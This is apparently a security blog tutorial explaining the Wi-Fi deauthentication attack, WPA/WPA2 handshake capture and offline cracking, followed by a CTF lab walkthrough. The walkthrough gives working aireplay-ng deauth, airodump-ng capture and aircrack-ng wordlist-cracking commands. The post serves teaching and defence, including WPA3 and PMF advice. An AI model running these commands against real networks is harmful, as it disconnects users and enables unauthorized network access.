Hacking WiFi – Deauthentication Client

Públicado en por

In this post, we’re going to look at one of the most classic Wi-Fi attacks: the deauthentication attack, and how it’s used to force clients to reconnect so an attacker can capture and crack the WPA/WPA2 handshake. No tool spam, no magic commands — just a clear breakdown of how the protocol works, where the weakness comes from, and why this attack is even possible in the first place.

If you’ve ever wondered how Wi-Fi handshakes are cracked, why getting “kicked off” a network is such a big deal, or why WPA3 had to happen at all, you’re in the right place. Grab a coffee and let’s break Wi-Fi the right way — by understanding it first.

Forcing Client Disconnects and Cracking the WPA/WPA2 Handshake

Disclaimer: This article is for educational and defensive security purposes only. Performing Wi‑Fi attacks on networks you do not own or have explicit permission to test is illegal in many jurisdictions.

1. What Problem Does the Deauthentication Attack Solve?

When attacking WPA/WPA2‑PSK Wi‑Fi networks, you don’t need to crack the Wi‑Fi password directly from the air. Instead, you capture a cryptographic exchange called the 4‑Way Handshake and then attempt to crack it offline.

The problem?

  • The handshake is only transmitted when a client connects or reconnects to the access point (AP).
  • If no one is connecting… there is nothing to capture.

The deauthentication attack solves this by forcibly disconnecting clients, causing them to reconnect and re‑transmit the handshake.

2. Key Concepts You Need to Understand First

Before diving into the attack, let’s break down the core Wi‑Fi concepts involved.

2.1 Access Point (AP)

The Access Point is the Wi‑Fi router. It:

  • Broadcasts the network name (SSID)
  • Authenticates clients
  • Manages encryption keys

Each AP has a unique BSSID, which is its MAC address.

2.2 Client (Station)

A client (STA) is any device connected to Wi‑Fi:

  • Laptop
  • Phone
  • IoT device

Each client also has a MAC address.

2.3 WPA/WPA2‑PSK Encryption Model

In WPA/WPA2‑PSK (pre‑shared key):

  • The Wi‑Fi password is never sent over the air
  • Both client and AP independently derive encryption keys from:
    • SSID
    • Wi‑Fi password
    • Random nonces

The process that verifies both sides know the password is the 4‑Way Handshake.

3. The 4‑Way Handshake (Core of the Attack)

The handshake is a challenge‑response protocol used to establish session keys.

3.1 Handshake Flow

Client                                Access Point
  |                                        |
  |<------------- (1) ANonce --------------|
  |                                        |
  |---- (2) SNonce + MIC ----------------->|
  |                                        |
  |<------------ (3) GTK + MIC ------------|
  |                                        |
  |---- (4) ACK -------------------------->|

Where:

  • ANonce: Random value generated by AP
  • SNonce: Random value generated by client
  • MIC: Message Integrity Code (proof client knows the password)
  • GTK: Group Temporal Key

⚠️ Important: Capturing just messages (1) and (2) is usually enough to crack the password offline.

4. Why the Handshake Can Be Cracked Offline

Once you capture the handshake:

  • You can guess passwords locally
  • No more interaction with the Wi‑Fi network is needed
  • No rate‑limiting or lockouts apply

Offline Cracking Logic

Guess Password
   ↓
Derive PMK
   ↓
Recalculate MIC
   ↓
Compare with Captured MIC

If the MIC matches → password is correct.

5. Enter the Deauthentication Attack

5.1 What Is Deauthentication?

Deauthentication is a legitimate 802.11 management frame used to:

  • Disconnect a client from an AP
  • Inform the client that authentication is no longer valid

Critical Flaw

In WPA/WPA2, deauthentication frames are:

  • Unauthenticated
  • Unencrypted

That means anyone can forge them.

6. How the Deauthentication Attack Works

Step‑by‑Step Overview

  1. Attacker monitors the Wi‑Fi network
  2. Identifies:
    • AP MAC (BSSID)
    • Client MAC(s)
  3. Attacker sends fake deauth frames
  4. Client gets disconnected
  5. Client automatically reconnects
  6. 4‑Way Handshake is transmitted
  7. Attacker captures handshake

6.1 Attack Flow Diagram

        [ Attacker ]
              |
              |  Deauth Frame (spoofed)
              v
        [ Client ]  x------> [ Access Point ]
              ^                    |
              |---- Reconnect -----|
              |
       Handshake Captured

7. Types of Deauthentication Attacks

7.1 Targeted Deauth (Client‑Specific)

  • Targets a specific client MAC
  • Stealthier
  • Faster handshake capture
Deauth: AP → Client

7.2 Broadcast Deauth (All Clients)

  • Uses broadcast MAC (FF:FF:FF:FF:FF:FF)
  • Disconnects every client
  • Noisy but effective
Deauth: AP → ALL

8. Capturing the Handshake

To capture the handshake, the attacker needs:

  • Wireless card supporting monitor mode
  • Ability to capture management frames

The attacker listens for:

  • EAPOL packets
  • Valid MIC values

Once captured, the attacker can stop interacting with the network entirely.

9. Cracking the Handshake

9.1 Dictionary Attack

Most common method:

  • Use wordlists (e.g. leaked passwords)
  • Try millions of guesses per second (GPU)

9.2 Mask Attacks

Used when you know the password structure:

CompanyName202?

9.3 Why Strong Passwords Matter

  • WPA2 is cryptographically strong
  • The password is the weakest link

A strong random passphrase makes handshake capture useless.

10. Limitations of Deauthentication Attacks

10.1 WPA3

WPA3 introduces:

  • Protected Management Frames (PMF)
  • SAE (Dragonfly) key exchange

Result:

  • Deauth frames are authenticated
  • Offline cracking is no longer feasible

10.2 No Clients = No Handshake

If no clients reconnect:

  • No handshake
  • Attack fails

11. Defensive Takeaways

To protect Wi‑Fi networks:

  • ✅ Use WPA3 where possible
  • ✅ Enable 802.11w (PMF)
  • ✅ Use long, random passphrases
  • ✅ Monitor for excessive deauth frames

12. Final Thoughts

The deauthentication attack is a classic Wi‑Fi design flaw:

  • Not a crypto failure
  • But a protocol trust issue

It remains one of the most important concepts to understand when learning:

  • Wireless pentesting
  • Wi‑Fi defense
  • Real‑world protocol weaknesses

If you understand deauth + handshake cracking, you understand why WPA3 exists.

Hands‑on lab walkthrough

This walkthrough is based on a CTF, it is why, some of the screenshots will be blurry.

  • update:
sudo apt -y update
  • Install aircrack:
sudo apt -y install aircrack-ng
  • Monitor the network:
airodump-ng wlan0
  • Monitor the specific Wireless network:
airodump-ng -c 1 --bssid WIFI_MAC_BSSID -w voip.pcap wlan0
  • From another terminal force the des authentication of the client:
aireplay-ng --deauth 0 -a WIFI_MAC_BSSID -c STATION_MAC wlan0
  • Then we will capture the handshake:
  • Crack the handshake:
aircrack-ng -w /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt voip.pcap-01.cap

Now that we have the password we can connect to the network:

  • Shutdown again the interface:
ifconfig wlan0 down
  • Change the interface mode:
iwconfig wlan0 managed
  • Create the configuration file that we are going to use with wpa on tmp:
echo 'ctrl_interface=/var/run/wpa_supplicant
network={
    ssid="WFI_NAME"
    psk="PASSWORD"
    key_mgmt=WPA-PSK
}' | sudo tee /tmp/ture/wpa_supplicant.conf
  • Connect to the wifi:
wpa_supplicant -i wlan0 -c /tmp/ture/wpa_supplicant.conf -B
  • Turn on the interface:
ifconfig wlan0 up
  • Request an IP through DHCP:
dhclient wlan0

Find more interesting post on:

Blog – Hardsoft Security

or subscribe to our newsletter to receive all the lastest posts:

Newsletter – Hardsoft Security

Deja un comentario

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.